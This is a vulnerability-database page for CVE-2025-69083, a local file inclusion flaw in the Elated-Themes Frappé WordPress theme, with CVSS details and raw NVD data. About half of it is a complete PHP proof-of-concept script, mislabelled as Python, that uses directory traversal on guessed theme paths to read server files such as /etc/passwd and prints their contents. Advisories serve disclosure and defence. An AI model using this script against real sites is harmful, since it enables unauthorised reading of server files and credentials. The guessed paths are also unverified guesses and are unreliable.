Security Vulnerability Report
中文
CVE-2025-69083 CVSS 8.1 HIGH

CVE-2025-69083

Published: 2026-01-06 17:15:45
Last Modified: 2026-04-23 15:36:20

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Frappé frappe allows PHP Local File Inclusion.This issue affects Frappé: from n/a through <= 1.8.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Elated-Themes Frappé frappe <= 1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-69083 PoC - Elated-Themes Frappé Local File Inclusion * Affected: Frappé theme <= 1.8 * * Usage: php poc.php <target_url> [target_file] * Example: php poc.php http://target.com /etc/passwd */ if ($argc < 2) { echo "Usage: php poc.php <target_url> [target_file]\n"; echo "Example: php poc.php http://victim.com /etc/passwd\n"; exit(1); } $targetUrl = rtrim($argv[1], '/'); $targetFile = isset($argv[2]) ? $argv[2] : '/etc/passwd'; // Common vulnerable paths in Frappé theme $vulnerablePaths = [ '/wp-content/themes/frappe/inc/loadmore.php', '/wp-content/themes/frappé/inc/loadmore.php', '/wp-content/themes/frappe/include.php', '/wp-content/themes/frappe/functions.php', '/?page_id=1&file=../../../../../../../' . ltrim($targetFile, '/') ]; echo "[*] CVE-2025-69083 PoC - Frappé LFI\n"; echo "[*] Target: {$targetUrl}\n"; echo "[*] File to read: {$targetFile}\n\n"; foreach ($vulnerablePaths as $path) { $url = $targetUrl . $path; if (strpos($path, '?') !== false) { echo "[+] Testing: {$url}\n"; } else { $exploitUrl = $url . '?file=' . urlencode('../../../../../../..' . $targetFile); echo "[+] Testing: {$exploitUrl}\n"; } $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10, 'ignore_errors' => true ] ]); $response = @file_get_contents( strpos($path, '?') !== false ? $url . urlencode('../../../../../../..' . $targetFile) : $exploitUrl, false, $context ); if ($response && strlen($response) > 0) { echo "[!] Potential file contents:\n"; echo "----------------------------------------\n"; echo substr($response, 0, 500); echo "\n----------------------------------------\n\n"; } } echo "[*] PoC completed. Check results above.\n"; echo "[*] Note: Target may be patched or use different parameter names.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69083", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:45.110", "lastModified": "2026-04-23T15:36:19.730", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Frappé frappe allows PHP Local File Inclusion.This issue affects Frappé: from n/a through <= 1.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/frappe/vulnerability/wordpress-frappe-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}